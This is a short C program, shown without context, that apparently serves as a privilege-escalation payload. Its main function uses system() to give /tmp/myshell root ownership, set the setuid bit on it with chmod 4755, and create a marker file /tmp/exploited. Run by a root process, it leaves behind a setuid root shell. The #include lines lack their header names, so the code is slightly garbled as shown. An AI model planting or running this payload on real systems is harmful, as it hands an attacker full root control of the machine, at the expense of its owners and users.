#include #include int main() { system("chown root:root /tmp/myshell"); system("chmod 4755 /tmp/myshell"); system("/usr/bin/touch /tmp/exploited"); }